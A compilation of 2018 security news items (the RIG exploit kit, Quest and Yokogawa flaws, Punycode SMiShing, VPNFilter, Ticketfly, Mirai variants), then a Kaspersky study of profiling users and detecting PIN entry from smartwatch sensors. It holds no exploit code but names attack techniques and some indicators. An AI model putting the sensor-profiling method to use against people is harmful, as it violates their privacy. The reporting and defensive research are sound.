Researchers from Trend Micro also observed that the RIG Exploit Kit is now leveraging CVE-2018-8174 to deliver Monero cryptocurrency miner.

“Along with updates in code, we also observed Rig integrating a cryptocurrency-mining malware as its final payload.” reads the analysis from Trend Micro.

“Based on the latest activities we’ve observed from Rig, they’re now also exploiting CVE-2018-8174, a remote code execution vulnerability patched in May and reported to be actively exploited.”

Cyber criminals were hijacking the traffic of legitimate sites and redirecting IE users to compromised websites hosting the RIG exploit kit. The RIG exploit kit was used to drop the Smoke Loader malware, a tiny dropper used to install on the infected system a cryptocurrency miner.

CVE-2018-8174 RIG exploit kit monero-miner-1

Tens of Vulnerabilities Found in Quest Appliances
3.6.2018 securityweek

Researchers at Core Security say they have discovered a total of more than 60 vulnerabilities in disk backup and system management appliances from Quest. The IT management firm has released patches, but threatened to take legal action against Core if it disclosed too many details.

More than 50 security holes have been found in Quest’s DR series disk backup appliances. The most serious of the flaws, according to Core, allows a remote and unauthenticated attacker to execute arbitrary system commands via the “password” parameter of the login process.

Experts also identified 45 other command injection issues in the product, but these require authentication. Core also claims to have uncovered six privilege escalation vulnerabilities that allow an attacker to gain root permissions.

The weaknesses impact Quest DR Series Disk Backup software version 4.0.3 and possibly earlier, and they have been patched with the release of version

A separate advisory from Core describes 11 flaws affecting Quest’s KACE Systems Management Appliance. Researchers found that the product’s web console is affected by three command injection vulnerabilities, including one that can be exploited by an unauthenticated attacker.

The list of security holes found in this product also includes privilege escalation, SQL injection, cross-site scripting (XSS), and path traversal issues.

The vulnerabilities have been patched with a hotfix that is available for Quest KACE System Management Appliance versions 7.0, 7.1, 7.2, 8.0, and 8.1.

During the disclosure of the KACE flaws, Quest told Core that its work is in breach of the vendor’s license agreement and asked the security firm not to make its findings public to avoid legal action.

Quest, whose products are reportedly used by 130,000 companies, does have a responsible disclosure policy, but it states that reports of any vulnerability are considered the company’s confidential and proprietary information and cannot be disclosed to third parties.

Core has only published limited information about each of the vulnerabilities, but the company says it’s disappointed by Quest’s posture on disclosure.

“CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk,” Core said.

Hardcoded Credentials Expose Yokogawa Controllers to Attacks
3.6.2018 securityweek Attack

Japanese electrical engineering company Yokogawa has released firmware updates for its STARDOM controllers to address a critical vulnerability that can be exploited remotely to take control of the device.

Yokogawa’s STARDOM FCJ, FCN-100, FCN-RTU and FCN-500 controllers running firmware version R4.02 or earlier have a hardcoded username and password that can be used by an attacker with access to the network to log in to the device and execute system commands.

The flaw is tracked as CVE-2018-10592 and it has been rated critical by both ICS-CERT and Yokogawa itself. The issue was discovered by VDLab, an industrial cybersecurity lab set up by Chinese companies Venustech and Dongfang Electric.Critical vulnerability found in Yokogawa controllers

The vendor patched the vulnerability with the release of version R4.10. Customers have been advised to update the firmware on their devices and also implement overall security measures to protect their systems.

Critical vulnerability found in Yokogawa controllers

The FCN-500 product has been designed for high reliability and speed, and it includes features designed to ensure that processes are not interrupted even if a module is replaced. The FCN-RTU model is designed for inhospitable locations where low power consumption is needed. The products are used worldwide in the energy, critical manufacturing, and food and agriculture sectors. The FCJ and FCN-100 models were discontinued in mid-2016.

Yokogawa has published a total of four security advisories this year. One published in January warns customers that CENTUM and Exaopc products are affected by a vulnerability that allows a local attacker to trigger false system and process alarms, and prevent alarm notifications from being displayed to the user.

An advisory from late April describes authentication bypass and denial-of-service (DoS) flaws affecting Vnet/IP switches. The company has also alerted customers to the risks introduced by the use of the Intel Management Engine, which has several potentially serious vulnerabilities.

Punycode Makes SMiShing Attacks More Deceiving
2.6.2018 securityweek Attack

Phishing attacks carried out via text messages that use the “Punycode” technique to make nefarious URLs look legitimate are becoming more popular, cloud security firm Zscaler says.

Referred to as SMiShing, SMS phishing is a technique where attackers use text messages in an attempt to trick users into clicking a link that usually leads to malware or asks for sensitive information from the victims.

Recently, cybercriminals engaged in SMiShing campaigns started using Punycode (a technique also known as homograph attack) to deceive users into believing they are accessing a legitimate link. Specifically, the attackers replace one or more characters in the URL with similar-looking characters that are represented differently in Punycode.

Attacks leveraging Punycode are not new and have been targeting Office 365 business users and Chrome and Firefox users, but only recently they started occurring more frequently in text message attacks.

SMiShing has been on the rise since the beginning of the year, and the adoption of new techniques clearly make it an important threat.

The use of Punycode as part of SMiShing campaigns increases the chances for successful compromise, as mobile phone users are unlikely to notice the modified URL.

In one of the observed incidents, the unsuspecting user received a WhatsApp message pretending to be a link to a Jet Airways offer of free air tickets. Although looking like the actual jetairways.com website, the link was using a homograph attack, thus getting the user to xn-jetarways-ypb.com instead.

If the link is accessed on an iPhone, Safari attempts to load the phishing website without displaying the correct link. Chrome on Android, however, displays the correct link (shows the URL in Punycode format) instead.

“The Web browsers decide whether to display the IDN or Punycode format based on conditions like the presence of certain characters which can spoof the separators like "." or "/", determining whether all characters come from same language, if characters belong to allowable combinations or by checking if the domain belongs to whitelisted TLDs,” Zscaler explains.

The domain used as part of the observed attack was newly registered, within the last two weeks, the researchers say. They also note that, after being served the phishing page, victims are redirected to another domain, newuewfarben[.]com, which can be used to serve malware.

“SMiShing has been on a rise in year 2018 and the addition of homograph technique will continue to make it more effective against unsuspecting mobile users. Web browsers have implemented protections against homograph attacks, but because of the legitimate use of Punycode characters, it becomes very difficult for the developers to implement a foolproof fix. Attackers leverage this to work around the rules and create homographs which are displayed as IDNs despite being malicious in nature,” Zscaler concludes.

WordPress Disables Plugins That Expose e-Commerce Sites to Attacks

2.6.2018 securityweek Vulnerebility

Researchers discovered vulnerabilities in ten WordPress plugins made by a company for e-commerce websites powered by the WooCommerce platform. WordPress disabled many of them after the developer failed to release patches.

WordPress security firm ThreatPress reported on Thursday that its researchers discovered various types of flaws in ten plugins from Multidots. The impacted plugins are available through WordPress.org and they allow WooCommerce users to manage different aspects of their online shops.

The vulnerable plugins have nearly 20,000 active installs, including 10,000 installations of Page Visit Counter, 3,000 installations of WooCommerce Category Banner Management, and 2,000 installations of WooCommerce Checkout for Digital Goods.

Experts discovered that the plugins made by Multidots are impacted by stored cross-site scripting (XSS), cross-site request forgery (CSRF) and SQL injection vulnerabilities that could be exploited to take complete control of impacted e-commerce sites.

According to researchers, attackers could deface websites, execute remote shells, plant keyloggers, and upload cryptocurrency miners or other types of malware. Attackers may be able to gain access to valuable information considering that the affected websites are online shops that collect personal and financial information.

“The vulnerabilities allow an unauthenticated attacker to inject malicious JavaScript, and thus provide the opportunity to hijack clients’ credit cards data and to receive clients’ and administrator’s logins,” ThreatPress’s Rasa Adams told SecurityWeek.

While exploitation in many cases requires the victim to access a specially crafted URL or visit a certain page, some of the flaws can be exploited without any user interaction.

Multidots was informed of the vulnerabilities on May 8 and confirmed the issues. However, after seeing that the developer failed to take any action, ThreatPress notified WordPress, which decided to disable a majority of the impacted plugins.

SecurityWeek reached out to Multidots for comment before ThreatPress made its findings public, but the company has not responded.

CVE identifiers have been assigned to four of the vulnerabilities and ThreatPress says it expects more to be assigned. The identifiers assigned to date are CVE-2018-11579, CVE-2018-11580, CVE-2018-11633 and CVE-2018-11632.

ThreatPress has published technical details and proof-of-concept (PoC) code for each of the vulnerabilities.

“It’s good to know that WordPress Security reacts quickly, but still, we have a big problem. There is no way to inform all users of these plugins about the threat,” Adams said in a blog post. “It’s strange that WordPress can show you information about available updates, but still can’t protect you by providing the information about closed plugins in the same way. We hope to see some changes in this area. In this case, we could notify owners of affected websites and secure almost twenty thousand websites.

Flaws in Multidots WordPress Plugins expose e-Commerce websites to a broad range of attacks
2.6.2018 securityaffairs

Researchers at ThreatPress firm discovered security vulnerabilities in ten WordPress plugins developed by Multidots, a company for e-commerce websites.
The vulnerable plugins are available on theWordPress.org and implement a set of features for WooCommerce installations that allow admins to manage their online shops, nearly 20,000 WordPress installs currently use them.

“Recently our research team found serious security issues in ten WordPress plugins developed by the same vendor – MULTIDOTS Inc. company. All vulnerable plugins designed to work alongside with WooCommerce so there is a real threat to all online stores powered by WooCommerce and one of these plugins.” reads a blog post published by ThreatPress.

“We found Stored Cross-Site Scripting (XSS), Cross-Site Request Forgery and SQL Injection vulnerabilities that could be exploited by hackers to upload keyloggers, shells, crypto miners and other malicious software or completely deface the website.”

closed wordpress plugins multidots

Multidots plugins are affected by stored cross-site scripting (XSS), cross-site request forgery (CSRF) and SQL injection vulnerabilities that could be exploited by an attacker to take complete control of e-commerce installs.

The flaws were tracked as CVE-2018-11579, CVE-2018-11580, CVE-2018-11633 and CVE-2018-11632, they could allow attackers to power a broad range of attacks, such as installing cryptocurrency miners or install exploit kits to deliver malware.

Experts warn that some vulnerabilities could be exploited without any user interaction.

The researchers at ThreatPress reported the flaw to Multidots on May 8, the company acknowledged the flaws but at the time it still hasn’t solved the flaws.

ThreatPress published technical details for the vulnerabilities and for each of them a proof-of-concept (PoC) code.

“It’s good to know that WordPress Security reacts quickly, but still, we have a big problem. There is no way to inform all users of these plugins about the threat,” Adams said in a blog post. “It’s strange that WordPress can show you information about available updates, but still can’t protect you by providing the information about closed plugins in the same way. We hope to see some changes in this area. In this case, we could notify owners of affected websites and secure almost twenty thousand websites.”

Crashing HDDs by launching an attack with sonic and ultrasonic signals

2.6.2018 securityaffairs Attack

A team of researchers from the University of Michigan and Zhejiang University has devised a method to cause physical damage to hard drives by using sonic and ultrasonic signals.
An attacker just needs to play ultrasonic sounds through a built-in speaker of a target computer or by using a speaker in its proximity.

The principle is simple, the technique leverages specially crafted acoustic signals to cause significant vibrations in the HDDs components that could cause severe damage.

Modern HDDs use shock sensors to prevent the head crash, but the team of researchers has demonstrated that sonic and ultrasonic sounds could cause false positives in the shock sensor, causing a drive to park the head in a wrong position.

“We created and modeled a new feedback controller that could be deployed as a firmware update to attenuate the intentional acoustic interference. Our sensor fusion method prevents unnecessary head parking by detecting ultrasonic triggering
of the shock sensor” reads the paper published by the experts.

ultrasonic signals attacks

The experts have demonstrated how to use the technique in a real-world attacks targeting HDDs in desktop computers and CCTV (Closed-Circuit Television) systems.

These attackers just need to trick victims into playing a malicious sound attached to an email or triggered visiting a specially crafted web page.

“Our case studies show that an attacker can use the effects from hard disk drive vulnerabilities to launch system level consequences such as crashing Windows on a laptop using the built-in speaker and preventing surveillance systems from recording video. We delve into the details of the Windows and Linux operating systems to uncover the root causes of the crash in the I/O request stack” continues the experts.

The experts tested the technique against various HDD from several vendors, including Seagate, Toshiba, and Western Digital. The discovery was interesting, the ultrasonic waves took just 5-8 seconds to cause severe interferences.

ultrasonic signals attacks

Sound interferences with a duration greater than 105 seconds caused the Western Digital HDD in the video-surveillance device to stop recording from the beginning of the vibration until the device was restarted.

“Recordings from periods of interference less than 105 seconds exhibited video loss from about 12 seconds after being subjected to acoustic induced vibration until the
vibration subsided. In contrast, (2) interference for periods of 105 seconds or longer resulted in video loss from the beginning of the vibration until the device was restarted.” continues the paper.

“In the case that a victim user is not physically near the system being attacked, an adversary can use any frequency to attack the system. The system’s live camera stream never displays an indication of an attack. Also, the system does not provide any method to learn of audio in the environment. Thus, if a victim user were not physically near the system, an adversary can use audible signals while remaining undetected.”

The tests demonstrated that an attacker can disrupt HDDs in desktops and laptops running both Windows and Linux operating system.

The experts were able to cause a Dell XPS 15 9550 laptops to freeze in 45 seconds and crash when the laptop was tricked to play malicious audio over its built-in speaker in 125 seconds.

The paper also includes recommendations to detect or prevent such type of attacks, including a new feedback controller to attenuate the acoustic interference that could be deployed as a firmware update.

Another countermeasure against attacks leveraging sonic and ultrasonic signals could be a sensor fusion method to prevent unnecessary head parking by detecting ultrasonic triggering of the shock sensor.

The last solution is represented by noise dampening materials to attenuate the signal.

Experts believe the botmaster of the VPNFilter is attempting to resume the botnet

2.6.2018 securityaffairs BotNet

Experts from security firms GreyNoise Intelligence and JASK and GreyNoise believe that the threat actor behind the VPNFilter is now attempting to resume the botnet with a new wave of infections.
A week ago security experts and law enforcement bodies reported the existence of a huge Russia-linked botnet tracked as VPNFilter.

The botnet infected over 500,000 routers and NAS devices, most of them in Ukraine, fortunately, a prompt action of authorities allowed to take down it.

VPNFilter malware

Researchers believe the nation-state malware was developed by the same author of the BlackEnergy malware.

Many infected devices have been discovered in Ukraine and their number in the country continues to increase. On May 8, Talos researchers observed a spike in VPNFilter infection activity, most infections in Ukraine and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware has infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

Unfortunately, botmasters are attempting to resume the botnet, this is what emerged from the monitoring of the malicious traffic associated with VPNFilter.

Experts from security firms GreyNoise Intelligence and JASK believe that the same threat actor is now attempting to resume the botnet with a new wave of infections.

“JASK actively partners with GreyNoise Intelligence (GNI) to establish better access and visibility for global and regional SYN traffic. Preliminary analysis of GNI results identifies a number of source IPs exclusively scanning for port 2000 (MikroTik devices) in Ukrainian networks.” states a report published by JASK.

“Activity like this raises some interesting questions about indications of ongoing Ukraine targeted campaigns, a likely subject for future research.”

The scans detected by the experts shows threat actors targeting Mikrotik routers on Ukrainian networks with port 2000 exposed online.

The VPNFilter malware is very sophisticated and implements many functionalities used by nation-state malware, such as wipe firmware, communicate via Tor, traffic monitoring, and the ability to target ICS devices.

The US authorities blamed Russia-linked APT28 hacking group for the creation of the botnet, Ukrainian bodies must be vigilant in order to thwart any cyber-attacks that could be powered by the VPNFilter botnet.

Visa payments DOWN: Millions affected by a service disruption
2.6.2018 securityweek Hacking

The Visa card payment system is suffering a widespread outage across Europe, millions of users were unable to make payments using their cards.
Shoppers and travelers were unable to make payments with their cards since at around 2.30pm on Friday across Europe.

At the time of writing, Visa confirmed the widespread problems but did not provide any details on the cause.


Visa and major banks informed their customers also through social media, while major retailers confirmed that users were not able to pay with their cards.

The problems suffered by Visa Payments are currently affecting also MasterCard and Amex because the two services were rerouting some transactions via Visa’s IT network.

Visa UK

We are currently experiencing a service disruption which is preventing some Visa transactions in Europe from being processed. We are investigating the cause and working as quickly as possible to resolve the situation. We will keep you updated.

6:49 PM - Jun 1, 2018
476 people are talking about this
Twitter Ads info and privacy

Bank of Ireland

We are aware some customers are experiencing Visa debit card issues. This is impacting multiple banks across Europe. We will update when we know more. Cash withdrawals can be made at any BOI ATM.

5:19 PM - Jun 1, 2018
19 people are talking about this
Twitter Ads info and privacy
“We are unable to accept Visa card payments currently. No retailers are able to accept Visa cards.” said Marks & Spencer.

Ticketfly website was compromised, the hacker also stole customers’ data
2.6.2018 securityweek Hacking

The website of the events ticketing company Ticketfly was shut down after a hacker who calls himself “IsHaKdZ” compromised it.
The hacker defaced the Ticketfly website with a picture of Guy Fawkes and a warning that read “Your Security Down im Not Sorry.” The attacker also published a yandex.com email account along with the following message:

“Ticketfly HacKeD By IsHaKdZ. Your Security Down im Not Sorry. Next time I will publish database ‘backstage’ (sic).”

The hacker also warned administrators that it has access to a database titled “backstage,” he shared links to files containing customer and client information, including names, physical addresses, phone numbers and email addresses.

Ticketfly hacked

Ticketfly, which is owned by Eventbrite, has taken down the site in response to the incident and posted a data breach notification.

“We are currently investigating a cybersecurity incident targeting Ticketfly.com that has resulted in the compromise of some client and customer information. After learning of the incident, we immediately launched an investigation, and out of an abundance of caution, we took the site down while we work to address the issue.” reads the data breach notification published by the company,

“Out of an abundance of caution, we have taken all Ticketfly systems temporarily offline as we continue to look into the issue. We are working to bring our systems back online as soon as possible,”

Troy Hunt

Seeing a lot of tweets about a breach at @ticketfly right now: https://twitter.com/search?q=ticketfly&src=typd …

6:38 AM - May 31, 2018
See Troy Hunt's other Tweets
Twitter Ads info and privacy
Everyone has purchased tickets via the Ticketfly platform will have to print them out and bring a photo ID to the venue hosting the event. Tiketfly provides printed guest lists to the venue.

People who have tickets purchased by other people may need to show the original payment card used to buy the ticket, a copy of the original buyer’s ID, and an authorization note from the original buyer.

Motherboard has spoken with the hacker who confirmed that initially attempted to contact the company to report a vulnerability in the website but without success. He asked for the payment of 1 bitcoin di disclose the issue, but without receiving reply he decided to exploit the flaw.

Motherboard confirmed the authenticity at least some of the records stored in the files leaked by the hacker.

“In an email conversation with Motherboard, the hacker claimed to have warned Ticketfly of a vulnerability that allowed him to take control of “all database” for Ticketfly and its website.” wrote Lorenzo Bicchierai on Motherboard. “The hacker said they asked for 1 bitcoin to share the details of the vulnerability but did not get a reply. The hacker shared what appears to be two emails between him and a series of Ticketfly employees in which the hacker mentions the vulnerability.”

The company confirmed that is still investigating the issue in order to determine the extent of the security breach.

“Our investigation into the incident is ongoing. We’re putting all of our resources to confirm the extent of the unauthorized access. We’re committed to communicating with all customers once we have more information about the scope of the issue,” Ticketfly told customers.” continues the notification.

Crooks expand the original Mirai botnet code base with new capabilities and improvements
2.6.2018 securityweek  CyberCrime

Cybercriminals continue to improve the infamous Mirai botnet by adding new exploits and functionalities, experts warn new dangerous variant will appear in the wild.
According to Netscout’s Arbor Security Engineering and Response Team (ASERT), cybercriminals continue to improve the dreaded Mirai IoT botnet by adding new exploits and functionalities.

The time to market of new Mirai botnet versions is drastically reducing, in a few months experts spotted at least four Mirai variants in the wild, Satori, JenX, OMG and Wicked.

Vxers are used the leaked Mirai source code to create their own version, this trend is scaring security experts.

“Using Mirai as a framework, botnet authors can quickly add in new exploits and functionally, thus dramatically decreasing the development time for botnets. The Mirai source is not limited to only DDoS attacks. A variant of Satori was discovered which attacks Ethereum mining clients.” states the report published by Netscout.

Mirai botnet

Below the key findings for the new Mirai Variants

Satori uses a remote code injection exploits to implement scanning feature.
The JenX bot evolved from Mirai to include similar coding, but authors removed scanning and exploitation capabilities.
The OMG bot adds HTTP and SOCKS proxy capabilities.
The Wicked Mirai exploits RCE flaws to infect Netgear routers and CCTV-DVR devices. When vulnerable devices are found, a copy of the Owari bot is downloaded and executed.
Cyber criminals will continue to use the Mirai variants to build large botnets, for this reason, it experts recommend organizations to apply proper patching, updates, and DDoS mitigation strategies to protect their infrastructure.

“As seen with the four samples covered above, botnet authors are already using the Mirai source code as their building blocks. As the explosion of IoT devices does not look to be slowing down, we believe we’ll continue to see increases in IoT botnets.” concluded the report.

“We are likely to see remnants of Mirai live on in these new botnets as well.”

Trojan watch

1.6.2018 Kaspersky Virus
The cyberphysical risks of wearable gadgets
We continue to research how proliferation of IoT devices affects the daily lives of users and their information security. In our previous study, we touched upon ways of intercepting authentication data using single-board microcomputers. This time, we turned out attention to wearable devices: smartwatches and fitness trackers. Or more precisely, the accelerometers and gyroscopes inside them.

From the hoo-ha surrounding Strava, we already know that even impersonal data on user physical activity can make public what should be non-public information. But at the individual level, the risks are far worse: these smart devices are able to track the moments you’re entering a PIN code in an ATM, signing into a service, or unlocking a smartphone.

In our study, we examined how analyzing signals within wearable devices creates opportunities for potential intruders. The findings were less than encouraging: although looking at the signals from embedded sensors we investigated cannot (yet) emulate “traditional” keyloggers, this can be used to build a behavioral profile of users and detect the entry of critical data. Such profiling can happen discreetly using legitimate apps that run directly on the device itself. This broadens the capacity for cybercriminals to penetrate victims’ privacy and facilitates access to the corporate network of the company where they work.

So, first things first.

Behavioral profiling of users
When people hear the phrase ‘smart wearables’, they most probably think of miniature digital gadgets. However, it is important to understand that most smartwatches are cyberphysical systems, since they are equipped with sensors to measure acceleration (accelerometers) and rotation (gyroscopes). These are inexpensive miniature microcircuits that frequently contain magnetic field sensors (magnetometers) as well. What can be discovered about the user if the signals from these sensors are continuously logged? More than the owner of the gadget would like.

For the purpose of our study, we wrote a fairly simple app based on Google’s reference code and carried out some neat experiments with the Huawei Watch (first generation), Kingwear KW88, and PYiALCY X200 smartwatches based on the Android Wear 2.5 and Android 5.1 for Smartwatch operating systems. These watches were chosen for their availability and the simplicity of writing apps for them (we assume that exploiting the embedded gyroscope and accelerometer in iOS would follow a similar path).

Logging smartwatch signals during password entry

To determine the optimal sampling frequency of the sensors, we conducted a series of tests with different devices, starting with low-power models (in terms of processor) such as the Arduino 101 and Xiaomi Mi Band 2. However, the sensor sampling and data transfer rates were unsatisfactory — to obtain cross-correlation values that were more or less satisfactory required a sampling frequency of at least 50 Hz. We also rejected sampling rates greater than 100 Hz: 8 Kbytes of data per second might not be that much, but not for hours-long logs. As a result, our app sampled the embedded sensors with a frequency of 100 Hz and logged the instantaneous values of the accelerometer and gyroscope readings along three axes (x, y, z) in the phone’s memory.

Admittedly, getting a “digital snapshot” of a whole day isn’t that easy, because the Huawei watch’s battery life in this mode is no more than six hours.

But let’s take a look at the accelerometer readings for this period. The vertical axis shows the acceleration in m/s2, and the horizontal the number of samples (each corresponds to 10 milliseconds on average). For a complete picture, the accelerometer and gyroscope readings are presented in the graphs below.

Digital profile of a user recorded in one hour. Top — accelerometer signals, bottom — gyroscope signals

The graphs contains five areas in which different patterns are clearly visible. For those versed in kinematics, this graph tells a lot about the user.

The most obvious motion pattern is walking. We’ll start with that.

When the user is walking, the hand wearing the smartwatch oscillates like a pendulum. Pendulum swings are a periodic process. Therefore, if there are areas on the graph where the acceleration or orientation readings from the motion sensor vary according to the law of periodicity, it can be assumed that the user was walking at that moment. When analyzing the data, it is worth considering the accelerometer and gyroscope readings as a whole.

Let’s take a closer look at the areas with the greatest oscillations over short time intervals (the purple areas Pattern1, Pattern3, and Pattern5).

Accelerometer and gyroscope readings during walking

In our case, periodic oscillations of the hand were observed for a duration of 12 minutes (Pattern1, figure above). Without requesting geoinformation, it’s difficult to say exactly where the user was going, although a double numerical integration of the acceleration data shows with an accuracy up to the integration constants (initial velocity and coordinates) that the person was walking somewhere, and with varying characteristic velocity.

Result of the numerical integration of the accelerometer data, which gives an estimate of the user’s movement along the x and y axes in the space of one hour (z-axis displacement is zero, so the graph does not show it)

Note that plotting the Y-axis displacement relative to the X-axis displacement gives the person’s approximate path. The distances here are not overly precise, but they are in the order of thousands of meters, which is actually quite impressive, because the method is very primitive. To refine the distance traveled, anthropometric data can be used to estimate the length of each step (which is basically what fitness trackers do), but we shall not include this in our study.

Approximate path of the person under observation, determined on the basis of numerically integrating the accelerometer data along the X and Y axes

It is more difficult to analyze the less active areas. Clearly, the person was at rest during these periods. The orientation of the watch does not change, and there is acceleration, which suggests that the person is moving by car (or elevator).

Another 22-minute segment is shown below. This is clearly not walking — there are no observable periodic oscillations of the signal. However, we see a periodic change in the acceleration signal envelope along one axis. It might be a means of public transport that moves in a straight line, but with stops. What is it? Some sort of public transportation?

Accelerometer data when traveling on public transport

Here’s another time slice.

Pattern 3, accelerometer data

This seems to be a mixture of short periods of walking (for a few seconds), pauses, and abrupt hand movements. The person is presumably indoors.

Below we interpret all the areas on the graph.

Accelerometer and gyroscope readings with decoding of areas

These are three periods of walking (12, 3, and 5 minutes) interspersed with subway journeys (20 and 24 minutes). The short walking interval has some particular characteristics, since it involved changing from one subway line to another. These features are clearly visible, but our interest was in determining them using algorithms that can be executed on the wearable devices themselves. Therefore, instead of neural networks (which we know to be great at this kind of task), we used a simple cross-correlation calculation.

Taking two walking patterns (Walking1 and Walking2), we calculated their cross-correlation with each other and the cross-correlation with noise data using 10-second signal data arrays.

Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
Walking1 and Walking2 0.73 0.70 0.64 0.62 0.41 0.83
Walking1 and Noise 0.33 0.30 0.32 0.30 0.33 0.33
Maxima of the functions for cross-correlation of walking patterns with each other and with an arbitrary noise pattern

It can be seen from the table that even this elementary approach for calculating cross-correlation functions allows us to identify the user’s movement patterns within his/her “digital snapshot” with an accuracy of up to 83% (given a very rough interpretation of the correlation). This indicator may not seem that high, but it should be stressed that we did not optimize the sample size and did not use more complex algorithms, for example, principle component analysis, which is assumed to work quite well in determining the characteristic parts of the signal log.

What does this provide to the potential attackers? Having identified the user’s movements in the subway, and knowing the characteristic directions of such movement, we can determine which subway line the user is traveling on. Sure, it would be much easier having data about the orientation of the X and Y axes in space, which could be obtained using a magnetometer. Unfortunately, however, the strong electromagnetic pickup from the electric motors, the low accuracy of determining a northerly direction, and the relatively few magnetometers in smartwatches forced us to abandon this idea.

Without data on the orientation of the X and Y axes in space (most likely, different for individual periods), the problem of decoding the motion trajectory becomes a geometric task of overlaying time slices of known length onto the terrain map. Again, placing ourselves in the attacker’s shoes, we would look for the magnetic field bursts indicate the acceleration/deceleration of an electric train (or tram or trolleybus), which can provide additional information allowing us to work out the number of interim points in the time slices of interest to us. But this too is outside the scope of our study.

Cyberphysical interception of critical data
But what does this all reveal about the user’s behavior? More than a bit, it turns out. It is possible to determine when the user arrives at work, signs into a company computer, unlocks his or her phone, etc. Comparing data on the subject’s movement with the coordinates, we can pinpoint the moments when they visited a bank and entered a PIN code at an ATM.

PIN codes
How easy is it to capture a PIN code from accelerometer and gyroscope signals from a smartwatch worn on the wrist? We asked four volunteers to enter personal PINs at a real ATM.

Accelerometer signals when entering a PIN code on an ATM keypad

Jumping slightly ahead, it’s not so simple to intercept an unencrypted PIN code from sensor readings by elementary means. However, this section of the “accelerometer log” gives away certain information — for example, the first half of the graph shows that the hand is in a horizontal position, while the oscillating values in the second half indicate keys being pressed on the ATM keypad. With neural networks, signals from the three axes of the accelerometer and gyroscope can be used to decipher the PIN code of a random person with a minimum accuracy of 80% (according to colleagues from Stevens Institute of Technology). The disadvantage of such an attack is that the computing power of smartwatches is not yet sufficient to implement a neural network; however, it is quite feasible to identify this pattern using a simple cross-correlation calculation and then transfer the data to a more powerful machine for decoding. Which is what we did, in fact.

Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person and different tries 0.79 0.87 0.73 0.82 0.51 0.81
Maxima of the functions for cross-correlation of PIN entry data at an ATM

Roughly interpreting these results, it is possible to claim 87% accuracy in recovering the PIN entry pattern from the general flow of signal traffic. Not bad.

Passwords and unlock codes
Besides trips to the ATM, we were interested in two more scenarios in which a smartwatch can undermine user security: entering computer passwords and unlocking smartphones. We already knew the answer (for computers and phones) using a neural network, of course, but we still wanted to explore first-hand, so to speak, the risks of wearing a smartwatch.

Sure, capturing a password entered manually on a computer requires the person to wear a smartwatch on both wrists, which is an unlikely scenario. And although, theoretically, dictionaries could be used to recover semantically meaningful text from one-handed signals, it won’t help if the password is sufficiently strong. But, again, the main danger here is less about the actual recovery of the password from sensor signals than the ease of detecting when it is being entered. Let’s consider these scenarios in detail.

We asked four people to enter the same 13-character password on a computer 20 times. Similarly, we conducted an experiment in which two participants unlocked an LG Nexus 5X smartphone four times each with a 4-digit key. We also logged the movements of each participant when emulating “normal” behavior, especially in chat rooms. At the end of the experiment, we synchronized the time of the readings, cutting out superfluous signals.

In total, 480 discrete functions were obtained for all sensor axes. Each of them contains 250-350 readings, depending on the time taken to enter the password or arbitrary data (approximately three seconds).

Signal along the accelerometer and gyroscope axes for four attempts by one person to enter one password on a desktop computer

To the naked eye, the resulting graphs are almost identical; the extremes coincide, partly because the password and mode of entry were identical in all attempts. This means that the digital fingerprints produced by one and the same person are very similar to each other.

Signals along the accelerometer and gyroscope axes for attempts to enter the same password by different people on a desktop computer

When overlaying the signals received from different people, it can be seen that, although the passphrase is the same, it is entered differently, and even visually the extremes do not coincide!

Attempts to enter a smartphone unlock code by two different people

It is a similar story with mobile phones. Moreover, the accelerometer captures the moments when the screen is tapped with the thumb, from which the key length can be readily determined.

But the eye can be deceived. Statistics, on the other hand, are harder to hoodwink. We started with the simplest and most obvious method of calculating the cross-correlation functions for the password entry attempts by one person and for those by different people.

The table shows the maxima of the functions for cross-correlation of data for the corresponding axes of the accelerometer and gyroscope.

Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person 0.92 0.63 0.71 0.55 0.76 0.96
Different persons 0.65 0.35 0.31 0.23 0.37 0.76
Maxima of the functions for cross-correlation of password input data entered by different people on a desktop computer

Broadly speaking, it follows that even a very simple cross-correlation calculation can identify a person with up to 96% accuracy! If we compare the maxima of the cross-correlation function for signals from different people in arbitrary text input mode, the correlation maximum does not exceed 44%.

Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person and different activity 0.32 0.27 0.39 0.26 0.30 0.44
Maxima of the functions for cross-correlation of data for different activities (password entry vs. usual surfing)

Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person 0.64 0.47 0.56 0.41 0.30 0.58
Different persons 0.33 0.40 0.40 0.32 0.38 0.34
Maxima of the functions for cross-correlation of data for an unlock code entered by one person and by different people

Note that the smallest cross-correlation function values were obtained for entering the smartphone unlock code (up to 64%), and the largest (up to 96%) for entering the computer password. This is to be expected, since the hand movements and corresponding acceleration (linear and angular) are minimal in the case of unlocking.

However, we note once more that the computing power available to a smartwatch is sufficient to calculate the correlation function, which means that a smart wearable gadget can perform this task by itself!

Speaking from the information security point of view, we can conclude that, without a doubt, portable cyberphysical systems expand the attack surface for potential intruders. That said, the main danger lies not in the direct interception of input data — that is quite difficult (the most successful results are achieved using neural networks) and thus far the accuracy leaves much to be desired. It lies instead in the profiling of users’ physical behavior based on signals from embedded sensors. Being “smart,” such devices are able to start and stop logging information from sensors not only through external commands, but on the occurrence of certain events or the fulfillment of certain conditions.

The recorded signals can be transmitted by the phone to the attacker’s server whenever the latter has access to the Internet. So an unassuming fitness app or a new watch face from the Google Play store can be used against you, right now in fact. The situation is compounded by the fact that, in addition to this app, simply sending your geotag once and requesting the email address linked to your Google Play account is enough to determine, based on your movements, who you are, where you’ve been, your smartphone usage, and when you entered a PIN at an ATM.

